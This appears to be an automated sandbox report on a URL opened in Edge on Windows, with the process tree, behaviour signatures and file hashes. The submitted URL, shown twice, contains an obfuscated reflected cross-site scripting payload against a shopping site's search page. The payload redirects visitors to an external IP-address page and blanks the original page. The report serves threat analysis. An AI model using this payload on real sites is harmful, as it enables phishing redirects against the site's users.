Analysis

  • max time kernel
    71s
  • max time network
    67s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-09-2024 04:55

General

  • Target

    https://24h.pchome.com.tw//search/?q=%22%3E%3E1996%3Cscript%3Ewindow%3B%3B%3B%3B%3B%3B%3B%3B%3B%3B%3B%3Blocation%2520%2520%5B%27replace%27%5D%28%5B%27h%27%2C%27t%27%2C%27t%27%2C%27p%27%2C%27%27%2C%27%3A%27%2C%60%2F%60%2C%60%2F%60%2C%271%27%2C%270%27%2C%273%27%2C%27.%27%2C%272%27%2C%279%27%2C%27.%27%2C%601%60%2C%278%27%2C%273%27%2C%27.%27%2C%274%27%2C%273%27%2C%27%2F%27%2C%27n%27%2C%27e%27%2C%27w%27%2C%274%27%2C%277%27%2C%27.%27%2C%27h%27%2C%27t%27%2C%27m%27%2C%27l%27%2C%27%3F%27%2C%27u%27%2C%27s%27%2C%27e%27%2C%27r%27%2C%27n%27%2C%27a%27%2C%27m%27%2C%27e%27%2C%27%3D%27%2C%[email protected]%27%5D%5B%27join%27%5D%28%27%27%29%29%2Cdocument%5B%27body%27%5D%5B%27style%27%5D%5B%27opacity%27%5D%3D0x0%3Bdocument.title%20%3D%20%22...%22%3C%2Fscript%3E%23YjYfNKR9gCe7MNP3mTf2KiflKdnpeynZhODlZgrxGxysHCGLobwoxzNnBWLbmtiKfdUYSGofuJjBCAvZEwqFsjzXtJGLFXbiCdnVNOaQfbJqwRFplMzxFMSHZTDkblThBIoSzJbGKdrhtkdIeywpQKpFPeqTXyhZZZDqrmXKufmkljb

Score
3/10

Malware Config

Signatures

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
  • Suspicious use of FindShellTrayWindow 25 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://24h.pchome.com.tw//search/?q=%22%3E%3E1996%3Cscript%3Ewindow%3B%3B%3B%3B%3B%3B%3B%3B%3B%3B%3B%3Blocation%2520%2520%5B%27replace%27%5D%28%5B%27h%27%2C%27t%27%2C%27t%27%2C%27p%27%2C%27%27%2C%27%3A%27%2C%60%2F%60%2C%60%2F%60%2C%271%27%2C%270%27%2C%273%27%2C%27.%27%2C%272%27%2C%279%27%2C%27.%27%2C%601%60%2C%278%27%2C%273%27%2C%27.%27%2C%274%27%2C%273%27%2C%27%2F%27%2C%27n%27%2C%27e%27%2C%27w%27%2C%274%27%2C%277%27%2C%27.%27%2C%27h%27%2C%27t%27%2C%27m%27%2C%27l%27%2C%27%3F%27%2C%27u%27%2C%27s%27%2C%27e%27%2C%27r%27%2C%27n%27%2C%27a%27%2C%27m%27%2C%27e%27%2C%27%3D%27%2C%[email protected]%27%5D%5B%27join%27%5D%28%27%27%29%29%2Cdocument%5B%27body%27%5D%5B%27style%27%5D%5B%27opacity%27%5D%3D0x0%3Bdocument.title%20%3D%20%22...%22%3C%2Fscript%3E%23YjYfNKR9gCe7MNP3mTf2KiflKdnpeynZhODlZgrxGxysHCGLobwoxzNnBWLbmtiKfdUYSGofuJjBCAvZEwqFsjzXtJGLFXbiCdnVNOaQfbJqwRFplMzxFMSHZTDkblThBIoSzJbGKdrhtkdIeywpQKpFPeqTXyhZZZDqrmXKufmkljb
    1⤵
    • Enumerates system info in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1268
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc201b46f8,0x7ffc201b4708,0x7ffc201b4718
      2⤵
        PID:2984
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,16919333879239616459,18137688675090909781,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:2
        2⤵
          PID:1272
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,16919333879239616459,18137688675090909781,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4964
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2080,16919333879239616459,18137688675090909781,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2796 /prefetch:8
          2⤵
            PID:1516
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16919333879239616459,18137688675090909781,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
            2⤵
              PID:408
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16919333879239616459,18137688675090909781,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
              2⤵
                PID:452
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16919333879239616459,18137688675090909781,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4104 /prefetch:1
                2⤵
                  PID:2964
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16919333879239616459,18137688675090909781,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4628 /prefetch:1
                  2⤵
                    PID:3740
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16919333879239616459,18137688675090909781,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3548 /prefetch:1
                    2⤵
                      PID:3632
                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,16919333879239616459,18137688675090909781,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5692 /prefetch:8
                      2⤵
                        PID:1208
                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,16919333879239616459,18137688675090909781,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5692 /prefetch:8
                        2⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2796
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16919333879239616459,18137688675090909781,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:1
                        2⤵
                          PID:1196
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16919333879239616459,18137688675090909781,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:1
                          2⤵
                            PID:3092
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16919333879239616459,18137688675090909781,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5220 /prefetch:1
                            2⤵
                              PID:3432
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16919333879239616459,18137688675090909781,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5704 /prefetch:1
                              2⤵
                                PID:2228
                            • C:\Windows\System32\CompPkgSrv.exe
                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                              1⤵
                                PID:4536
                              • C:\Windows\System32\CompPkgSrv.exe
                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                1⤵
                                  PID:2360

                                Network

                                MITRE ATT&CK Enterprise v15

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                  Filesize

                                  152B

                                  MD5

                                  ff63763eedb406987ced076e36ec9acf

                                  SHA1

                                  16365aa97cd1a115412f8ae436d5d4e9be5f7b5d

                                  SHA256

                                  8f460e8b7a67f0c65b7248961a7c71146c9e7a19772b193972b486dbf05b8e4c

                                  SHA512

                                  ce90336169c8b2de249d4faea2519bf7c3df48ae9d77cdf471dd5dbd8e8542d47d9348080a098074aa63c255890850ee3b80ddb8eef8384919fdca3bb9371d9f

                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                  Filesize

                                  152B

                                  MD5

                                  2783c40400a8912a79cfd383da731086

                                  SHA1

                                  001a131fe399c30973089e18358818090ca81789

                                  SHA256

                                  331fa67da5f67bbb42794c3aeab8f7819f35347460ffb352ccc914e0373a22c5

                                  SHA512

                                  b7c7d3aa966ad39a86aae02479649d74dcbf29d9cb3a7ff8b9b2354ea60704da55f5c0df803fd0a7191170a8e72fdd5eacfa1a739d7a74e390a7b74bdced1685

                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                  Filesize

                                  1KB

                                  MD5

                                  946dd09996104a10b059c26010618fd4

                                  SHA1

                                  a3534a4fac2d98b26f39044a371803807b4a8a25

                                  SHA256

                                  6527233a4c13917e63b640261dc7ddeb124f5555c5b7e5ae82ad7bb8dae61537

                                  SHA512

                                  c908c69dcd24df09b6dcac2ece4034f150d3a7c42c7155cf48d11beb3760ea25ade110f41d33175395ff35e057d7e537ab745dc9dd2627732f715101e2bebff9

                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                  Filesize

                                  5KB

                                  MD5

                                  9fe0a6808663f6425e62cd757e88ea96

                                  SHA1

                                  043a8b14b2b6fac6aea1821fffe12d5c4c37e96b

                                  SHA256

                                  3859b40b6fa292a3bae5c8689a54aa99e015f150b548169e478e0b758b130ac8

                                  SHA512

                                  a6984805b14187f2e460e8be3871c9af1228359f7937067f3ab669be0a47ba5645bc1ffe72a661242011d98c2c8799a2d17bf9692cdb73cfe93401fb53881908

                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                  Filesize

                                  6KB

                                  MD5

                                  534e8cc404aa285c4967feddedcc9c64

                                  SHA1

                                  dadc05c19e27da01226dfb5129c7ad10447daacd

                                  SHA256

                                  ba1fd8a7e70109af733b103a9f71c89208e7d0e8c400face55340cf9b4bb9224

                                  SHA512

                                  bc6cdd0f150d360c39023e62cc4eb39095cc91be6024615a5bc05d5f9b4a27b03f4456113a82e3bc6e007a883300bc88ffa5b27152ae8b21a90426c103c07a02

                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                  Filesize

                                  6KB

                                  MD5

                                  c4e941ea3bcb24de1ed33259148747df

                                  SHA1

                                  b7838f10943c862c828a7a7493340de9bf7817ab

                                  SHA256

                                  af58b794823f3db3682c0030ae5d7c0e6c6b090237b16bd621ebffd746e81812

                                  SHA512

                                  fd4dc8787b094f00ff4aeb7b4b5754fa5b7920cfcc1fe48ebac4ffd776271c254e468b09e3aa7fdeeee7dd0fc12dd741f6d8aa57f6f9be0d3d2e3bdf0dfb4b5b

                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                  Filesize

                                  16B

                                  MD5

                                  6752a1d65b201c13b62ea44016eb221f

                                  SHA1

                                  58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                  SHA256

                                  0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                  SHA512

                                  9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                  Filesize

                                  10KB

                                  MD5

                                  2130eba71c390f1b67b9291c9c282387

                                  SHA1

                                  879c3823de65ea1ec98f78c5d80c78bab1fe6964

                                  SHA256

                                  6cc9cc4c580978de57a9bf1e6166658b0d4d4f561d65d39920ecaf881a0ae003

                                  SHA512

                                  8f49303296319af8430886712ad8de0d74fa65a3f5daaa79b15279b18a261b879239007578e5c097eee79e506a7cf32aafb4f886470be95d5b2a47075c13aa77